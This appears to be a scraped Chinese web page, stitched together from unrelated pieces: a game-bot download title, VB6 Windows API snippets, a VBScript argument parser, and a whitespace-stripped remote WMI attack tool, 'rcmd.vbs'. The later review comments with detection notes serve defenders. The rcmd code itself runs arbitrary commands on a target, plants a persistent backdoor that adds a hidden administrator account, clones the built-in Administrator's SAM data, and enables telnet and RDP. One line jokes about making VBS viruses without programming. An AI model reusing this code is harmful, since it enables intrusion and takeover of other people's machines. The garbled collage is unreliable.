神武3手游自动日常挂机辅助脚本大漠下载


一、利用API获取窗口的标题。建立窗体Form1和按钮Command1,在窗体模块中添加如下代码:
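Option Explicit

' Declared in the form's declarations section.
' GetWindowTextA copies the caption of the window identified by hwnd into
' lpString and returns the number of characters copied. cch is the size of
' the buffer; it must never be larger than the string actually allocated
' for lpString, otherwise the API can write past the end of the buffer.
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" _
    (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long

' Prints the return code, the caption of this form and the length passed
' to the API when Command1 is clicked.
Private Sub Command1_Click()
    Dim returncode As Long
    Dim captext As String
    Dim caplen As Long

    ' Pre-allocate a 100-character buffer filled with Chr$(0); the API
    ' writes into this existing storage and cannot grow it.
    captext = String$(100, 0)
    caplen = 99   ' kept below Len(captext) so the terminating null always fits

    returncode = GetWindowText(Me.hwnd, captext, caplen)

    Print returncode
    ' Only the first returncode characters are caption text; the rest of
    ' the buffer is still null padding and is not printed.
    Print Left$(captext, returncode)
    Print caplen
End Sub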
二、获取鼠标在当前窗口(客户区)的屏幕坐标。建立一新项目窗体form1并添加控件文本框Text1、Text2,在窗体模块中输入:
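Option Explicit

' Screen coordinate pair filled in by GetCursorPos.
' Each field needs its own line; "X As Long Y As Long" does not compile.
Private Type POINTAPI
    X As Long
    Y As Long
End Type

' lpPoint is passed by reference so the API can write the coordinates.
Private Declare Function GetCursorPos Lib "user32" (lpPoint As POINTAPI) As Long

Dim pt As POINTAPI
Dim returncode As Long

' Clears both text boxes and maximises the form.
Private Sub Form_Load()
    Text1.Text = ""
    Text2.Text = ""
    ' MaxButton and MinButton are read-only at run time in VB6; set both
    ' to False in the form's Properties window at design time instead of
    ' assigning them here.
    Form1.WindowState = 2   ' 2 = maximised
End Sub

' Shows the cursor's screen coordinates while the mouse moves over the form.
' The X/Y parameters of the event are form-relative and are not used.
Private Sub Form_MouseMove(Button As Integer, _
        Shift As Integer, X As Single, Y As Single)
    ' Note: the pt structure is passed by reference.
    returncode = GetCursorPos(pt)
    Text1.Text = pt.X
    Text2.Text = pt.Y
End Sub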
三、记录Windows使用时间
建立新项目窗口form1,输入代码:
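' Appends one line to memo.txt in the application's own folder.
' NOTE(review): the log sits next to the executable, so the account running
' the program needs write access there, and anyone else with write access
' to that folder can alter the log.
Private Sub AppendMemoLine(ByVal entry As String)
    Dim logPath As String
    Dim fileNum As Integer

    ' App.Path has no trailing backslash unless it is a drive root, so
    ' plain concatenation with "memo.txt" would build the wrong path.
    logPath = App.Path
    If Right$(logPath, 1) <> "\" Then logPath = logPath & "\"
    logPath = logPath & "memo.txt"

    ' FreeFile avoids clashing with a file number that is already open.
    fileNum = FreeFile
    Open logPath For Append As #fileNum
    Print #fileNum, entry
    Close #fileNum
End Sub

' Hides the form and records the start time.
Private Sub Form_Load()
    Form1.Visible = False
    AppendMemoLine "启动windows:" & CStr(Now)
End Sub

' Records the shutdown time, then ends the program.
Private Sub Form_Unload(Cancel As Integer)
    AppendMemoLine "关闭windows:" & CStr(Now)
    End
End Sub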
最后将此程序加入启动组即可。从此以后,要制造vbs脚本病毒不用再学编程了。

动画视听语言与分镜头脚本设计


' searches for and returns the value of a command line argument of the form
' /argName:value from the supplied array. erases the entry in the array so
' that only untouched entries remain.

function GetArgValue(argName, args())
    ' Looks for the first entry of args that starts with "/argName:"
    ' (compared case-insensitively), blanks that entry in the caller's
    ' array and returns whatever follows the colon. Returns "" when the
    ' switch is absent or carries no value.
    '
    ' The value is returned exactly as supplied on the command line; the
    ' caller has to validate it before using it in a path, a query or a
    ' command line.
    dim prefix
    dim prefixLen
    dim idx
    dim candidate

    prefix = "/" & argName & ":"
    prefixLen = Len(prefix)
    GetArgValue = ""

    for idx = 0 to UBound(args)
        candidate = args(idx)
        if Len(candidate) >= prefixLen then
            if UCase(Left(candidate, prefixLen)) = UCase(prefix) then
                ' consume the entry so that a later pass can report
                ' whatever switches were never recognised
                args(idx) = ""
                ' Mid past the end of the string yields "", which covers
                ' the "/argName:" with no value case
                GetArgValue = Mid(candidate, prefixLen + 1)
                exit function
            end if
        end if
    next
end function

更多的时候,我们需要在脚本之间共享变量,以及相互调用函数。如果要实现复杂的功能,如捕捉特征点、获得特性、参数化绘图等,能否让完成界面及计算功能,把参数传给一个Lisp程序,然后再将程序调入环境中完成绘图呢?答案是肯定的,这就要用到“SendKey”语句。


使用:D:\>iget.vbs

4.rcmd.vbs
'***************
'rcmd.vbsby黑嘿黑
'***************
' NOTE(review): this listing lost its whitespace during extraction
' ("onerrorresumenext"); it is reproduced unchanged as a reference sample.
'
' What the visible code does: it takes a target address, a user name and a
' password as the three command-line arguments, connects to the target's
' root/cimv2 WMI namespace with SWbemLocator.ConnectServer, and adds four
' privileges (numeric values 23, 18, 7 and 11) to the connection before
' handing control to the menu in main().
' The numbers appear to be WbemPrivilegeEnum values (23 RemoteShutdown,
' 18 Shutdown, 7 Security, 11 Systemtime) - confirm against the WMI docs.
'
' Detection and mitigation notes:
' - The credentials are plain command-line arguments, so process-creation
'   logging with command lines enabled on the operator's host records the
'   target, the account and the password.
' - On the target this is remote WMI over DCOM: expect a network logon for
'   the supplied account, followed by activity hosted in WmiPrvSE.exe.
' - Remote WMI needs an administrative account on the target. Unique
'   local administrator passwords per host, firewall rules for DCOM/WMI and
'   restricted WMI namespace permissions limit where such a connection
'   can succeed.
onerrorresumenext
setoutstreem=wscript.stdout
setinstreem=wscript.stdin
if(lcase(right(wscript.fullname,11))="wscript.exe")then
setobjShell=wscript.createObject("wscript.shell")
objShell.Run("cmd.exe/kcscript//nologo"&chr(34)&wscript.scriptfullname&chr(34))
endif
ifwscript.arguments.count<3then
usage()
wscript.echo"Notenoughparameters."
wscript.quit
endif

ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)

usage()
outstreem.write"Conneting"&ipaddress&"...."
setobjlocator=createobject("wbemscripting.swbemlocator")'20
setobjswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
objswbemservices.security_.privileges.add23,true
objswbemservices.security_.privileges.add18,true
objswbemservices.security_.privileges.add7,true
objswbemservices.security_.privileges.add11,true
iferrornumber<>0then
wscript.echo"Error!"
callmain()
else
wscript.echo"OK!"
endif
callmain()

'***********************************************************
functiondoor()
' NOTE(review): listing kept verbatim (whitespace was lost in extraction,
' and several string literals below are broken across lines).
'
' What the visible code does: through Win32_Process.Create on the target it
' echoes a second script into %windir%\system32\svrer.vbs and then runs it
' with cscript. The generated script, as far as the strings show:
' - sets its own file attributes to 34 and writes a hidden
'   %windir%\system32\SYSTEM.bat
' - creates a local account named IUSE_SERVER and adds it to the local
'   administrators group (both directly and from SYSTEM.bat)
' - writes a value named Win32 under HKLM\...\CurrentVersion\Run
' - writes Command Processor\AutoRun under both HKLM and HKCU
' - sets ...\Folder\Hidden\SHOWALL\CheckedValue to 0
' - schedules SYSTEM.bat with at for 20:00, 20:10, 20:20 and 20:30
'
' Indicators to hunt for (all taken from the strings below):
' - files svrer.vbs and SYSTEM.bat in %windir%\system32
' - a local administrator account named IUSE_SERVER
' - the Run value "Win32" and a Command Processor AutoRun value pointing at
'   a .vbs file
' Useful telemetry: account creation and local-group membership changes in
' the Security log (4720, 4732), registry-set and file-create events from
' an endpoint sensor, and cmd.exe or cscript.exe started as a child of
' WmiPrvSE.exe.
outstreem.write"Creatingtheblankdoor.."
setobjinstproc=objswbemservices.get("win32_process")
cmddoor="cmd/cechodimwsh,FA,FSO,t>%windir%\system32\svrer.vbs"_
&"&&echosetfso=CreateObject(""Scripting.FileSystemObject"")>>%windir%\system32\svrer.vbs"_
&"&&echoSetFA=FSO.GetFile(WScript.scriptFullName)>>%windir%\system32\svrer.vbs"_
&"&&echoFA.Attributes=34>>%windir%\system32\svrer.vbs"_
&"&&echosett=fso.CreateTextFile(""%windir%\system32\SYSTEM.bat"",true)>>%windir%\system32\svrer.vbs"_
&"&&echot.WriteLine(""netuserIUSE_SERVERxyhack.91i.net/add"")>>%windir%\system32\svrer.vbs"_
&"&&echot.WriteLine(""netlocalgroupadministratorsIUSE_SERVER/add"")>>%windir%\system32\svrer.vbs"_
&"&&echot.WriteLine(""Attrib+h%windir%\system32\SYSTEM.bat"")>>%windir%\system32\svrer.vbs"_
&"&&echot.Close>>%windir%\system32\svrer.vbs"_
&"&&echosetwsh=CreateObject(""WScript.Shell"")>>%windir%\system32\svrer.vbs"_
&"&&echowsh.run""netuserIUSE_SERVERxyhack.91i.net/add"",0,true>>%windir%\system32\svrer.vbs"_
&"&&echowsh.run""netlocalgroupadministratorsIUSE_SERVER/add"",0,true>>%windir%\system32\svrer.vbs"_
&"&&echowsh.Regwrite

""HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs"_
&"&&echowsh.Regwrite

""HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"",0,""REG_DWORD"">>%win

dir%\system32\svrer.vbs"_
&"&&echowsh.regwrite""HKEY_LOCAL_MACHINE\Software\Microsoft\Command

Processor\AutoRun"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs"_
&"&&echowsh.regwrite""HKEY_CURRENT_USER\Software\Microsoft\Command

Processor\AutoRun"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs"_
&"&&echowsh.run""cmd/cat20:00,20:10,20:20,20:30%windir%\system32\SYSTEM.bat"",0,true

>>%windir%\system32\svrer.vbs"
objinstproc.create(cmddoor)
showerror(err.number)
Wscript.Sleep(1500)
outstreem.write"Runingtheblankdoor.."
objinstproc.create("cmd/ccscript%windir%\system32\svrer.vbs")
showerror(err.number)
callmain()
endfunction
'***********************************************************
functionca()
' NOTE(review): listing kept verbatim (whitespace lost in extraction; the
' registry path in the setbinaryvalue line is garbled in the source).
'
' What the visible code does: it reads an account name and password from
' stdin, looks up the account's SID, and stages two helper scripts in
' %temp% on the target (ca.vbs and getsys.vbs).
' - ca.vbs reads the binary "F" value of SAM\SAM\Domains\Account\Users\000001F4
'   and writes it to the "F" value of another key under ...\Users, then sets
'   a caflag marker under HKLM\SOFTWARE\Microsoft\WindowsScriptHost\Settings.
' - getsys.vbs schedules ca.vbs with at for 23:59, sets the system clock to
'   23:58:59.90, waits, and restores the saved time.
' The function starts the Schedule service if it is disabled or stopped,
' polls for the caflag marker, runs net user for the chosen account, then
' restores the service state and deletes the helper scripts and the marker.
' 000001F4 is RID 500, presumably the built-in Administrator; the at job is
' presumably used because the SAM key is only accessible to SYSTEM.
'
' Detection notes:
' - system time change events (Security 4616) around 23:59 that are reverted
'   seconds later
' - start-type change and start of the Task Scheduler service from a
'   WMI-hosted process
' - ca.vbs / getsys.vbs in %temp% and the caflag value, while they exist
' - password reset events for the account named at the prompt
' - offline comparison of the "F" values under SAM\...\Users: two accounts
'   carrying identical data is the lasting artifact of this technique
outstreem.write"GettingSIDof"&causername&"...."
Wscript.Echo"enterthecausername:"
causername=WScript.StdIn.Readline()
Wscript.Echo"enterthecapassword:"
capassword=WScript.StdIn.Readline()
outstreem.write"GettingSIDof"&causername&"...."
setcolinstsid=objswbemservices.execquery("select*fromwin32_useraccountwherename="&chr(34)&causername&chr(34))
foreachobjinstsidincolinstsid
strsid=objinstsid.sid
sidflag=right(strsid,len(strsid)-instrrev(strsid,"-"))
strflag=cstr(hex(sidflag))
regname=string(8-len(strflag),"0")&strflag
next
ifstrsid=""then
wscript.echo"Error."&vbcrlf&"Usernameisnotexist."
callmain()
else
wscript.echo"OK!"
endif

outstreem.write"Prepairing.."
setobjinstproc=objswbemservices.get("win32_process")
showerroronly(err.number)
cmdline="cmd/cechosetoreg=getobject(""winmgmts:root\default:stdregprov"")>%temp%\ca.vbs"_
&"&&echooreg.getbinaryvalue^&h80000002,""SAM\SAM\Domains\Account\Users\000001F4"",""F"",uvalue>>%temp%\ca.vbs"_
&"&&echooreg.setbinaryvalue^&h80000002,""SAM\SAM\Domains\Account\Users"?name&""",""F"",uvalue>>%temp%\ca.vbs"_
&"&&echosetsh=createobject(""wscript.shell"")>>%temp%\ca.vbs"_
&"&&echosh.regwrite""HKLM\SOFTWARE\Microsoft\WindowsScriptHost\Settings\caflag"",""1"">>%temp%\ca.vbs"
objinstproc.create(cmdline)
showerroronly(err.number)
cmdline="cmd/cechoatime=time>%temp%\getsys.vbs"_
&"&&echosetsh=createobject(""wscript.shell"")>>%temp%\getsys.vbs"_
&"&&echosh.run""cmd/cat23:59cscript%temp%\ca.vbs"",0,true>>%temp%\getsys.vbs"_
&"&&echosh.run""cmd/ctime23:58:59.90"",0,true>>%temp%\getsys.vbs"_
&"&&echowscript.sleep(1100)>>%temp%\getsys.vbs"_
&"&&echosh.run""cmd/ctime""^&atime,0,true>>%temp%\getsys.vbs"
objinstproc.create(cmdline)
showerror(err.number)

outstreem.write"Processing."
setcolinstsvr=objswbemservices.execquery("select*fromwin32_servicewherename='schedule'")
showerroronly(err.number)
foreachobjinstsvrincolinstsvr
flag1=0
flag2=0
ifobjinstsvr.startmode="Disabled"then
objinstsvr.changestartmode("Manual")
flag1=1
endif
ifobjinstsvr.started=flasethen
errnumber=objinstsvr.startservice()
flag2=1
endif
showerroronly(err.number)
objinstproc.create("cmd/ccscript%temp%\getsys.vbs")
showerroronly(err.number)
setobjinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")
fori=1to20
objinstreg.getstringvalue&h80000002,"SOFTWARE\Microsoft\WindowsScriptHost\Settings","caflag",svalue
ifsvalue="1"then
exitfor
else
wscript.sleep(500)
endif
next
objinstproc.create("netuser"&causername&""&capassword)
ifflag1thenobjinstsvr.changestartmode("Disabled")
ifflag2thenobjinstsvr.stopservice()
next
ifsvalue<>"1"then
wscript.echo"Error."&vbcrlf&"Waitingtimeout."
else
showerror(err.number)
endif

outstreem.write"CleanUp.."
objinstproc.create("cmd/cdel%temp%\ca.vbs")
showerroronly(err.number)
objinstproc.create("cmd/cdel%temp%\getsys.vbs")
showerroronly(err.number)
ifsvalue="1"thenobjinstreg.deletevalue&h80000002,"SOFTWARE\Microsoft\WindowsScriptHost\Settings","caflag"
showerror(err.number)
callmain()
endfunction

functionshowerroronly(errornumber)
iferrornumberThen
wscript.echo"Error0x"&cstr(hex(err.number))&"."
iferr.description<>""then
wscript.echo"Errordescription:"&err.description&"."
endif
callmain()
else
outstreem.write"."
endif
endfunction

'***********************************************************
functionshare()
Wscript.Echostring(18,"-")
Wscript.Echo"0.返回CMD>="
wscript.echo"1.列出共享信息:="
Wscript.Echo"2.创建共享="
Wscript.Echo"3.删除共享="
Wscript.Echostring(18,"-")
Wscript.Echo"pleasechosetheparameter:"
parameters=WScript.StdIn.Readline()
SelectCaseparameters
case"quit","0"
main()
case"list","1"
listshare()
case"open","2"'40
openshare()
case"close","3"
closeshare()
endSelect
endfunction

functionlistshare()
outstreem.write"ListingtheNetsharefrom"&ipaddress&"...."
SetcolShares=objswbemservices.ExecQuery("Select*fromWin32_Share")
showerror(err.number)'50
wscript.echo_
("Caption"&chr(9)&chr(9)&"Name:"&chr(9)&chr(9)&"Path")
ForeachobjShareincolShares
wscript.echo_
(objShare.Caption&chr(9)&objShare.Name&chr(9)&chr(9)&objShare.Path)
Next
wscript.echovbcrlf&"AllSharehavebeenlistedSuccessfully!"
callshare()
endfunction

functionopenshare()
wscript.echo"Enterthepath:"'70
path=WScript.StdIn.Readline()
wscript.echo"Enterthename:"
sname=WScript.StdIn.Readline()
ConstFILE_SHARE=0
ConstMAXIMUM_CONNECTIONS=25
SetobjNewShare=objswbemservices.Get("Win32_Share")
errReturn=objNewShare.Create_
(path,sname,FILE_SHARE,_
MAXIMUM_CONNECTIONS,"默认共享")
wscript.echo"ThenSharehavebeenCeatedSuccessfully!"
callshare()
endfunction

functioncloseshare()
wscript.echo"PleseEnterThename:"
kname=WScript.StdIn.Readline()
outstreem.write"killingthe"&kname&"...."
SetcolShares=objswbemservices.ExecQuery_
("Select*fromWin32_ShareWhereName="&"'"&kname&"'")
ForEachobjShareincolShares
objShare.Delete
Next
showerror(err.number)
callshare()
endfunction
'***********************************************************
functionlistsvr()
outstreem.write"ListingtheServicefrom"&ipaddress&"...."
SetcolListOfServices=objswbemservices.ExecQuery_
("Select*fromWin32_Service")
showerror(err.number)
wscript.echo_
("Name"&chr(9)&chr(9)&"State"&chr(9)&chr(9)&"Mode"&chr(9)&"PathName")
ForEachobjServiceincolListOfServices
iflen(objService.name)<8then
strname=objService.name&chr(9)
else
strname=objService.name
endif
wscript.echo_
(strname&chr(9)&objService.State&chr(9)&chr(9)&objService.StartMode&chr(9)&objService.PathName)
Next
wscript.echovbcrlf&"AllServiceshavebeenlistedSuccessfully!"
callmain()
endfunction
'************************************************************
functionreboot()
outstreem.write"Now,restartingtarget...."
strwqlquery="select*fromwin32_operatingsystemwhereprimary='true'"
setcolinstances=objswbemservices.execquery(strwqlquery)
foreachobjinstanceincolinstances
objinstance.win32shutdown(6)
next
showerror(err.number)
callmain()
endfunction
'*************************************************************
functioninf()
outstreem.write"GettingInfomationfrom"&ipaddress&"...."
setobj1=objget("win32_computersystem")
showerror(err.number)
wscript.echo""&vbcrlf
setobj2=objget("win32_operatingsystem")
setcol3=objswbemservices.instancesof("win32_processor")
setobj4=objget("win32_logicalmemoryconfiguration")
setobj5=objget("win32_bios")
setobj6=objget("win32_displayconfiguration")
setcol7=objswbemservices.instancesof("win32_diskdrive")
setcol8=objswbemservices.instancesof("win32_logicaldisk")
setcol9=objswbemservices.instancesof("win32_networkadapterconfiguration")
setcol10=objswbemservices.instancesof("win32_quickfixengineering")

wnl"OSInfo:"
wnl"ComputerName:"&obj1.name
wnl"UserName:"&obj1.username
wnl"Domain:"&obj1.domain
domainrole=""
selectcaseobj1.domainrole
case0
domainrole="Workstation"
case1
domainrole="MemberWorkstation"
case2
domainrole="Server"
case3
domainrole="MemberServer"
case4
domainrole="BackupDomainController"
case5
domainrole="MainDomainController"
endselect
withobj2
wnl"DomainRole:"&domainrole
wnl"Caption:"&.caption
wnl"Organization:"&.organization
wnl"RegisteredUser:"&.registereduser
wnl"InstallDate:"&timeformat(.installdate)
wnl"LastBootUpTime:"&timeformat(.lastbootuptime)
wnl"WindowsDirectory:"&.windowsdirectory
wnl"SystemDirectory:"&.systemdirectory
wnl"BootDevice:"&.bootdevice
wnl"CountryCode:"&.countrycode
wnl"CSName:"&.csname
wnl"Description:"&.description
wnl"Manufacturer:"&.manufacturer
wnl"SerialNumber:"&.serialnumber
wnl"Version:"&.version
wnl"SystemType:"&obj1.systemtype
wnl"SystemStartupDelay:"&obj1.systemstartupdelay&"s"
wnl"SystemStartupOptions:"&obj1.systemstartupoptions(0)
fori=1toubound(obj1.systemstartupoptions)
wnlspace(28)&obj1.systemstartupoptions(i)
next
endwith

wnlvbcrlf&"ProcessorInfo:"
wnl"NumberOfProcessors:"&obj1.numberofprocessors
foreachobj3incol3
withobj3
wnl"DeviceID:"&.deviceid
wnl"Name:"&.name
wnl"CurrentClockSpeed:"&.currentclockspeed&"MHz"
wnl"Description:"&.description
wnl"ExtClock:"&.extclock&"MHz"
wnl"L2CacheSize:"&.l2cachesize&"KB"
wnl"L2CacheSpeed:"&.l2cachespeed&"MHz"
wnl"ProcessorId:"&.processorid
wnl"Manufacturer:"&.manufacturer
wnl"SocketDesignation:"&.socketdesignation
wnl"AddressWidth:"&.addresswidth&"Bit"
wnl"DataWidth:"&.datawidth&"Bit"
endwith
next

withobj4
wnlvbcrlf&"MemoryInfo:"
wnl"TotalPhysicalMemory:"&cint(.totalphysicalmemory/1024)&"MB"
wnl"FreePhysicalMemory:"&cint(obj2.freephysicalmemory/1024)&"MB"
wnl"TotalPageFileSpace:"&cint(.totalpagefilespace/1024)&"MB"
wnl"TotalVirtualMemory:"&cint(.totalvirtualmemory/1024)&"MB"
wnl"AvailableVirtualMemory:"&cint(.availablevirtualmemory/1024)&"MB"
endwith

wnlvbcrlf&"BIOSInfo:"
wnl"Description:"&obj5.description
wnl"CurrentLanguage:"&obj5.currentlanguage
wnl"Version:"&obj5.version
wnl"Manufacturer:"&obj5.manufacturer


withobj6
wnlvbcrlf&"DisplayConfiguration:"
wnl"Caption:"&.caption
wnl"DeviceName:"&.devicename
wnl"DriverVersion:"&.driverversion
wnl"DisplayFrequency:"&.displayfrequency&"Hz"
wnl"BitsPerPel:"&.bitsperpel&"Bit"
wnl"Pels:"&.pelswidth&"x"&.pelsheight
endwith

wnlvbcrlf&"DiskInfo:"
foreachobj7incol7
withobj7
wnl"DeviceID:"&.deviceid
wnl"Caption:"&.caption
wnl"InterfaceType:"&.interfacetype
wnl"SCSIBus:"&.scsibus
wnl"SCSILogicalUnit:"&.scsilogicalunit
wnl"SCSIPort:"&.scsiport
wnl"SCSITargetId:"&.scsitargetid
wnl"SectorsPerTrack:"&.sectorspertrack&"KB"
wnl"Partitions:"&.partitions
wnl"Size:"&sizeformat(.size)
endwith
next
str="Volume"+space(2)+"Type"+space(8)+"Format"+space(4)
str=str+"Size"+space(6)+"Free"+space(12)+"Label"
wnlstr
foreachobj8incol8
withobj8
drivetype=""
selectcase.drivetype
case0
drivetype="Unknow"
case1
drivetype="NoRootDir"
case2
drivetype="Removable"
case3
drivetype="Fixed"
case4
drivetype="Network"
case5
drivetype="CD-ROM"
case6
drivetype="RAM"
endselect
strpercent=""
if.size<>""and.freespace<>""then
strpercent="("&formatpercent(.freespace/.size,0)&")"
endif
str=""&wsp(.caption,8)&wsp(drivetype,12)&wsp(.filesystem,10)&wsp(sizeformat(.size),10)
str=str&wsp(sizeformat(.freespace)&strpercent,16)&.volumename
wnlstr
endwith
next

wnlvbcrlf&"NICInformaton:"
foreachobj9incol9
withobj9
if.IPEnabledthen
wnl"Index:"&.index
wnl"Description:"&.description
wnl"DHCPEnabled:"&.dhcpenabled
wnl"DHCPServer:"&.dhcpserver
wnl"DNSHostName:"&.dnshostname
wnl"DNSServerSearchOrder:"&wfl(.dnsserversearchorder)
wnl"WINSPrimaryServer:"&.winsprimaryserver
wnl"IPAddress:"&wfl(.ipaddress)
wnl"MACAddress:"&.macaddress
wnl"DefaultIPGateway:"&wfl(.defaultipgateway)
wnl"IPSubnet:"&wfl(.ipsubnet)
wnl"IPFilterSecurityEnabled:"&.ipfiltersecurityenabled
wnl"IPSecPermitIPProtocols:"&wfl(.ipsecpermitipprotocols)
wnl"IPSecPermitTCPPorts:"&wfl(.ipsecpermittcpports)
wnl"IPSecPermitUDPPorts:"&wfl(.ipsecpermitudpports)
endif
endwith
next

wnlvbcrlf&"HotFixesInfo:"
foreachobj10incol10
wnl"HotFixID:"&obj10.hotfixid
wnl"FixComments:"&obj10.fixcomments
wnl"InstallDate:"&obj10.installdate
wnl"ServicePackInEffect:"&obj10.servicepackineffect
next

wnlvbcrlf&"Applications:"
setobjswb1=objlocator.connectserver(ipaddress,"root/default",username,password)
setobj11=objswb1.get("stdregprov")
HKLM=&h80000002
keypath="SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
obj11.enumkeyHKLM,keypath,keyarray
redimstr(ubound(keyarray)+1)
j=0
fori=0toubound(keyarray)
obj11.getstringvalueHKLM,keypath+keyarray(i),"displayname",strvalue
ifstrvalue<>""then
str(j)=strvalue
j=j+1
endif
next
ifj>1then
fori=0toj-1
fork=0toj-i-1
ifstrcomp(str(k),str(k+1),1)=1then
strtemp=str(k+1)
str(k+1)=str(k)
str(k)=strtemp
endif
next
next
endif
fori=0toj-1
wnl""&str(i)
next
wscript.echo""&vbcrlf
wscript.echo"TheInfomationfrom&ipaddress&hadbeenlistedSuccessfully!"
callmain()
endfunction

subwnl(msg)
wscript.echomsg
ifisobject(of)then
onerrorresumenext
of.writelinemsg
showerror()
onerrorgoto0
endif
endsub

functionwfl(byrefobj)
str=""
fori=0toubound(obj)
str=str&obj(i)&""
next
wfl=str
endfunction

functionwsp(msg,num)
ifmsg<>""then
msg=left(msg,num-1)
wsp=msg&space(num-len(msg))
else
wsp=space(num)
endif
endfunction

functiontimeformat(msg)
timeformat=left(msg,4)&"/"&mid(msg,5,2)&"/"&mid(msg,7,2)&""&mid(msg,9,2)&":"&mid(msg,11,2)&":"&mid(msg,13,2)
endfunction

functionsizeformat(msg)
ifmsg<>""then
size=msg/1048576
ifsize>1024then
sizeformat=round(size/1024,2)&"GB"
else
sizeformat=round(size,1)&"MB"
endif
endif
endfunction

functionobjget(msg)
setcol=objswbemservices.instancesof(msg)
foreachobjxincol
setobj=objx
next
setobjget=obj
endfunction

'******************************************
functioncommand()
wscript.echo"PleseEnterTheCommand:"
callrun()
endfunction

functionrun()
' NOTE(review): listing kept verbatim (whitespace lost in extraction).
'
' What the visible code does: reads one line from stdin and passes it as
' CommandLine to the Create method of Win32_Process on the connected host,
' then prints the return value and the new process id. "exit", "quit" or
' "0" goes back to the menu. No output of the command is collected.
'
' Detection notes: a process started this way is a child of WmiPrvSE.exe on
' the target rather than of an interactive shell, so process-creation
' events whose parent is WmiPrvSE.exe (in particular cmd.exe, cscript.exe
' or net.exe) are the primary signal. WMI-Activity operational logging
' also records the remote method execution.
strcmdline=WScript.StdIn.Readline()
ifstrcmdline="exit"orstrcmdline="quit"orstrcmdline="0"then
callmain()
endif
outstreem.write"Runningthecommand...."
setobjinstance=objswbemservices.get("win32_process")
setobjmethod=objinstance.methods_("create")
setobjinparam=objmethod.inparameters.spawninstance_()
objinparam.commandline=strcmdline
setobjoutparam=objinstance.execmethod_("create",objinparam)
ifobjoutparam.returnvalue<>0then
wscript.echo"Error!"
callcommand()
else
wscript.echo"OK!"
endif
wscript.echo"TheProcessIDis"&objoutparam.processid
wscript.echo"Runingcommand:"&strcmdline&".to"&ipaddress&"Successfully!"&vbcrlf
callcommand()
endfunction
'*******************************************
functionpslist()
outstreem.write"Listingprocess...."
setcolinstances=objswbemservices.execquery("select*fromwin32_process")
showerror(err.number)
wscript.echovbcrlf&"Name"&chr(9)&chr(9)&"Pid"&chr(9)&"ExecutablePath"
foreachobjinstanceincolinstances
iflen(objinstance.name)<8then
strname=objinstance.name&chr(9)
else
strname=objinstance.name
endif
wscript.echostrname&chr(9)&objinstance.handle&chr(9)&objinstance.executablepath
next
wscript.echovbcrlf&"AllprocesshavebeenlistedSuccessfully!"
callmain()
endfunction
'*****************************************
functionpskill()
wscript.echo"pleseentertheprocess'sid:"
strprocess=WScript.StdIn.Readline()
outstreem.write"Killingid="&strprocess&"process...."
setobjinstance=objswbemservices.get("win32_process.handle="&"'"&strprocess&"'")
ifvartype(objinstance)<>vbobjectthen
wscript.echovbcrlf&"Specifiedprocessisnotexist."
callmain()
else
setobjmethod=objinstance.methods_("terminate")
setobjinparam=objmethod.inparameters.spawninstance_()
objinparam.reason=0
setobjoutparam=objinstance.execmethod_("terminate",objinparam)
showerror(objoutparam.returnvalue)
wscript.echo"Theprocess'sid="&strprocess&"havebeenkilledSuccessfully!"
endif
callmain()
endfunction
'********************************************************
functiontelnet()
outstreem.write"Queryingstateoftelnetserver...."
setobjswbemservices=objlocator.connectserver(ipaddress,"root\cimv2",username,password)
setcolinstances=objswbemservices.execquery("select*fromwin32_servicewherename='tlntsvr'")
showerror(err.number)
foreachobjinstanceincolinstances
ifobjinstance.startmode="Disabled"then
outstreem.write"Telnetserverhasbeendisabled.Nowchangeingstartmodetomanual...."
setobjmethod=objinstance.methods_("changestartmode")
setobjinparam=objmethod.inparameters.spawninstance_()
objinparam.startmode="Manual"
setobjoutparam=objinstance.execmethod_("changestartmode",objinparam)
showerror(objoutparam.returnvalue)
endif
outstreem.write"Changeingstate...."
ifobjinstance.started=truethen
intstatus=objinstance.stopservice()
showerror(intstatus)
wscript.echo"TargettelnetserverhasbeenSTOPSuccessfully."
else
showerror(intstatus)
wscript.echo"pleseenterthentlm:"
ntlm=WScript.StdIn.Readline()
wscript.echo"pleseentertheport:"
port=WScript.StdIn.Readline()
ifnotisnumeric(ntlm)orntlm<0orntlm>2then
wscript.echo"ThevalueofNTMLiswrong."
callmain()
endif
ifnotisnumeric(port)then
wscript.echo"Thevalueofportiswrong."
main()
endif
setobjswbemservices1=objlocator.connectserver(ipaddress,"root/default",username,password)
outstreem.write"SettingNTLM="&ntlm&"...."
setobjinstance1=objswbemservices1.get("stdregprov")
setobjmethod=objinstance1.methods_("SetDWORDvalue")
setobjinparam=objmethod.inparameters.spawninstance_()
objinparam.hdefkey=&h80000002
objinparam.ssubkeyname="SOFTWARE\Microsoft\TelnetServer\1.0"
objinparam.svaluename="NTLM"
objinparam.uvalue=ntlm
setobjoutparam=objinstance1.execmethod_("SetDWORDvalue",objinparam)
showerror(objoutparam.returnvalue)
outstreem.write"Settingport="&port&"...."
objinparam.svaluename="TelnetPort"
objinparam.uvalue=port
setobjoutparam=objinstance1.execmethod_("SetDWORDvalue",objinparam)
showerror(objoutparam.returnvalue)
intstatus=objinstance.startservice()
wscript.echo"TargettelnetserverhasbeenSTARTSuccessfully!"
wscript.echo"Now,youcantry:telnet"&ipaddress&""&port&",togetashell."
endif
next
callmain()
endfunction
'********************************************************
functionrs()
' NOTE(review): listing kept verbatim (whitespace lost in extraction).
'
' What the visible code does: checks whether the target's OS caption
' contains "Server", asks for a port number (accepted range 1-65000), and
' then writes a series of registry values through StdRegProv in the
' root/default namespace:
' - ...\Control\TerminalServer  TSEnabled = 1
' - ...\Services\TermDD and ...\Services\TermService  Start = 2
' - ...\TerminalServer\WinStations\RDP-Tcp  PortNumber = <entered port>
' - ...\Policies\Microsoft\Windows\Installer  EnableAdminTSRemote = 1
' - ...\CurrentVersion\netcache  Enabled = 0
' - .DEFAULT\KeyboardLayout\Toggle  Hotkey = "1"
